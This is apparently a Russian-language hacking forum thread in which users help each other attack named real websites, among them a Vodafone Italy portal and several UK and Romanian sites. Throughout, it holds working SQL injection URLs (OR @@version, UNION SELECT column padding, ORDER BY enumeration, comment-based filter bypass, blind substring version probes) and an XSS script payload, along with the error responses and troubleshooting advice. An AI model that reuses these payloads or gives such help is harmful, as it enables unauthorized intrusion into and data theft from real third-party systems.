это бага? если да то неполучается узнать даже версию Code: /details.asp?id=699882982&dme_code=1%20or%201=@@version-- в ответ получаю Code: Microsoft OLE DB Provider for SQL Server error '80040e21' Incorrect syntax near the keyword 'or'. /inc/connection.asp, line 48
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto? что здесь такое?
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mod=prosto
Code: http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script> Не более...
http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- version() PostgreSQL не могу найти вывод, или все таки слепая?
Фильтрация union, select Работает http://www.topnews.ru/citation.php?autor=749+order+by+8/* Неработает http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//* Gorev http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null,null,null,1,null,null,null,null,null,null,2,3--
Есть скуля======================================================== http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1' ================================================================ Слобцов 7...... http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7-- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8-- ================================================================ Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7-- Всё равно пишит-------The used SELECT statements have a different number of columns ================================================================ Что такое? Как это обойти? ================================================================ P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать? Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел)))) ================================================================ ================================================================
Code: http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5-- Code: http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4-- Code: http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3-- 3-тяя ветка, в ней union select непашет!